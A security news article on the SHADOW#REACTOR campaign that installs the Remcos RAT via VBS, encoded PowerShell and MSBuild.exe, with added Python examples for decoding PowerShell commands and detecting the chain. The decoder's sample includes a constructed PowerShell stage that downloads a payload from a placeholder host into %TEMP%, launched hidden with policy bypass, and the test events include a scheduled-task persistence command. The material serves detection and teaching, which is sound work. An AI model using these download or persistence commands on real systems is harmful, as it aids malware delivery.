
We Detected New Malware That Allows Remote Control of Windows PCs
TL;DR
A new malware campaign, identified as **SHADOW#REACTOR**, installs a **remote access trojan** (RAT) called **Remcos**, allowing **cybercriminals** to control infected devices. The attack uses social engineering techniques, including fraudulent emails and messages, to deceive victims.
According to the report's author, the security company **Securonix**, the intrusion begins when the victim clicks a malicious link. This delivers an obfuscated **Visual Basic** script named "win64.vbs", which runs under **wscript.exe**, the legitimate Windows Script Host. This first stage does little on its own; it prepares the system for the stages that follow.
The VBS script then launches **PowerShell** with a **Base64**-encoded command. Base64 is an encoding, not encryption: it hides the script from casual inspection and simple string matching, but the command decodes trivially once it is recovered from the command line or from PowerShell logs.
The decoded PowerShell script contacts a remote server controlled by the attackers using the .NET **System.Net.WebClient** class. It downloads a file with an innocuous .txt extension, named "qpwoe64.txt" or "qpwoe32.txt" depending on whether the operating system is 64-bit or 32-bit, and saves it in the Windows temporary directory.
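To make this stage concrete for a responder, here is an added Python helper (not from the Securonix report or from the campaign's own code) that decodes a PowerShell `-EncodedCommand` argument and flags the behaviours described above: WebClient download, staging in the temp directory, a .txt payload and a size-check retry loop. The sample command line is constructed for this example; the staging script, the placeholder URL (stage.example.invalid) and the hidden-window switch are assumptions, and only the file name qpwoe64.txt comes from the page.

```python
import base64
import re
from typing import Optional

# Behaviours described for the PowerShell stage, expressed as regexes over the
# decoded script and the launching command line. Names are this example's own.
INDICATORS = {
    "webclient_download": re.compile(r"System\.Net\.WebClient|DownloadFile|DownloadString", re.I),
    "temp_staging": re.compile(r"\$env:TEMP|\\AppData\\Local\\Temp\\|%TEMP%", re.I),
    "txt_stage": re.compile(r"\.txt\b", re.I),
    "retry_loop": re.compile(r"\bwhile\b.*\bTest-Path\b|\.Length\s*-lt\s*\d+", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
}

# powershell.exe accepts -e, -ec, -enc, ... as abbreviations of -EncodedCommand.
ENCODED_SWITCH = re.compile(r"-(?:e|ec|enc\w*)\s+([A-Za-z0-9+/=]+)", re.I)


def encode_command(script: str) -> str:
    """Produce what an attacker passes to -EncodedCommand: Base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(token: str) -> str:
    """Reverse encode_command. PowerShell expects UTF-16LE under the Base64, so a
    naive .decode('utf-8') would leave a NUL byte between every character."""
    return base64.b64decode(token).decode("utf-16-le")


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Return the Base64 token from a powershell.exe command line, if present."""
    m = ENCODED_SWITCH.search(cmdline)
    return m.group(1) if m else None


def triage(cmdline: str) -> dict:
    """Decode the command line (if encoded) and report which indicators fire."""
    token = extract_encoded_command(cmdline)
    decoded = decode_encoded_command(token) if token else ""
    text = cmdline + "\n" + decoded  # switches live on the command line, behaviour in the script
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    return {"encoded": token is not None, "decoded": decoded, "indicators": hits, "score": len(hits)}


# Constructed stage-two script mirroring the behaviour described above (download,
# stage under %TEMP%, loop until the file exists and is large enough). The URL is a
# placeholder; only the file name qpwoe64.txt is taken from the report.
SAMPLE_STAGE = r"""$c = New-Object System.Net.WebClient
$p = "$env:TEMP\qpwoe64.txt"
$u = 'http://stage.example.invalid/qpwoe64.txt'
$c.DownloadFile($u, $p)
while (-not (Test-Path $p) -or (Get-Item $p).Length -lt 4096) { Start-Sleep 5; $c.DownloadFile($u, $p) }
"""
SAMPLE_CMDLINE = "powershell.exe -w hidden -ep bypass -enc " + encode_command(SAMPLE_STAGE)

if __name__ == "__main__":
    result = triage(SAMPLE_CMDLINE)
    print(result["decoded"])
    print(result["indicators"], result["score"])
```

Run on the constructed command line, all five indicators fire; a plain `powershell.exe -NoProfile -Command Get-Process` scores zero. The UTF-16LE detail matters in practice: tooling that decodes `-EncodedCommand` as UTF-8 produces text full of NULs and then fails to match any of the strings above.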
Advanced Techniques Hinder Detection
This attack stands out for its download **verification** and retry logic. After requesting the text file, the script enters a **loop** that checks whether the file exists and whether it meets a minimum expected size.
If the file is missing or incomplete, the script pauses and downloads it again. Even once the timeout is exceeded, execution continues rather than aborting, so a transient network failure does not break the initial infection. This kind of robustness is a sign of careful planning.
Once the criteria are met, the script writes a second PowerShell script, "jdywa.ps1", also to the temporary directory.
This script invokes a **loader** protected with **.NET Reactor**, a commercial .NET obfuscator that complicates static analysis of the code.
When Legitimate Tools Become Weapons
The loader performs critical functions, such as establishing persistence in the system and retrieving the next phase of the malware, as well as implementing checks to avoid detection by security tools.
In the final stage of the attack, the operators rely on a technique called **"living-off-the-land"**: legitimate, signed tools that ship with the operating system are used to carry out the malicious activity, so it blends in with normal system behaviour and is unlikely to be blocked by allowlisting alone.
In this case **MSBuild.exe**, **Microsoft**'s build engine, which compiles applications from project files, is used to launch the Remcos RAT on the victim's computer. Scheduled tasks are also created to re-run the VBS script, so the malware keeps operating even if some components are removed. Researchers assess that this campaign is extensive, primarily targeting **business environments** and **small to medium-sized enterprises**.
The technique employed is concerning, as it aligns with the operations of **initial access brokers**, who compromise systems and subsequently sell access to other cybercriminal groups, enabling them to carry out more complex attacks, such as **ransomware** or **data theft**.
The innovative aspect of this campaign is the use of **intermediate stages** based on plain text, along with the dynamic reconstruction of malicious code in computer memory using PowerShell and a protected loader.
This framework has been meticulously planned to hinder detection by antivirus software and analysis by security experts. The modular and well-maintained design suggests it is a professional operation with significant resources.
How to Protect Yourself
Securonix recommends several measures to avoid being affected by such attacks:
- Increase user awareness about threats involving scripts;
- Educate employees about the risks of executing downloaded scripts and warn them about unexpected files;
- Restrict or monitor the execution of VBS, JS, and PowerShell scripts, especially those from user-writable directories;
- Ensure that **Endpoint Detection and Response** (EDR) solutions can detect suspicious behaviors from script interpreters;
- Enable enhanced PowerShell logging to identify suspicious activities;
- Watch for misuse of trusted, signed binaries such as MSBuild.exe, wscript.exe and PowerShell, especially when they run from unusual parent processes or directories;
- Monitor for suspicious shortcuts and scheduled tasks that may compromise the system.
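The MSBuild and scheduled-task chain described above, and the monitoring items in this list, translate directly into process-tree rules. The following Python is an added example (not Securonix's detection content) that runs four such rules over a constructed set of Sysmon-style process-creation records: a script host running a script from a user-writable directory, a script host launching PowerShell with an encoded command, MSBuild.exe spawned by PowerShell or handed a project file from a user-writable path, and a scheduled task registered to re-run a script host. The user name, PIDs, the project file name stage.proj and the task name are invented for the example; win64.vbs, wscript.exe, MSBuild.exe and the temp directory come from the description above.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcEvent:
    """Minimal process-creation record (the fields Sysmon Event ID 1 or Windows 4688 provide)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Directories an unprivileged user can write to; scripts and project files there are suspect.
USER_WRITABLE = re.compile(r"\\(?:Users\\[^\\]+\\AppData\\Local\\Temp|Users\\Public|ProgramData)\\", re.I)
# -e, -ec, -enc, ... are all accepted abbreviations of -EncodedCommand.
ENCODED_SWITCH = re.compile(r"-(?:e|ec|enc\w*)\s", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (pid, rule_name) for every event that matches a rule, in event order."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        pname = basename(parent.image) if parent else ""
        # Rule 1: a script host executing a script from a user-writable directory
        if name in SCRIPT_HOSTS and USER_WRITABLE.search(e.cmdline):
            alerts.append((e.pid, "script_host_user_writable"))
        # Rule 2: PowerShell with an encoded command, launched by a script host
        if name in POWERSHELL and pname in SCRIPT_HOSTS and ENCODED_SWITCH.search(e.cmdline):
            alerts.append((e.pid, "script_host_encoded_powershell"))
        # Rule 3: MSBuild.exe used as a LOLBin: spawned by PowerShell or a script host,
        # or handed a project file that lives in a user-writable directory
        if name == "msbuild.exe" and (pname in (POWERSHELL | SCRIPT_HOSTS) or USER_WRITABLE.search(e.cmdline)):
            alerts.append((e.pid, "msbuild_lolbin"))
        # Rule 4: a scheduled task registered to re-run a script host or script file
        if (name == "schtasks.exe" and re.search(r"/create", e.cmdline, re.I)
                and re.search(r"wscript|cscript|\.vbs\b|\.js\b", e.cmdline, re.I)):
            alerts.append((e.pid, "scheduled_task_script_host"))
    return alerts


# Constructed event set: the described chain (explorer -> wscript -> powershell -> MSBuild,
# plus a persistence task) followed by benign activity the rules must not flag.
TEMP = r"C:\Users\alice\AppData\Local\Temp"
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\wscript.exe", f'wscript.exe "{TEMP}\\win64.vbs"'),
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -enc SQBFAFgA"),
    ProcEvent(400, 300, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
              f'MSBuild.exe "{TEMP}\\stage.proj"'),
    ProcEvent(500, 300, r"C:\Windows\System32\schtasks.exe",
              f'schtasks.exe /create /sc minute /mo 30 /tn Updater /tr "wscript.exe {TEMP}\\win64.vbs"'),
    ProcEvent(600, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile -Command Get-Date"),
    ProcEvent(650, 100, r"C:\Program Files\Microsoft Visual Studio\devenv.exe", "devenv.exe"),
    ProcEvent(700, 650, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
              r"MSBuild.exe C:\src\app\app.csproj"),
]

if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

The parent-child relationship is what separates the malicious MSBuild.exe launch from a developer's build: the same binary invoked by devenv.exe on a project under C:\src raises nothing, while the copy spawned by PowerShell with a project file in %TEMP% does. In a real deployment these rules would read Sysmon or 4688 events rather than an in-memory list, and the user-writable path list should be extended to whatever your environment allows users to write to.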
These practices are essential to reinforce security and mitigate potential attacks.


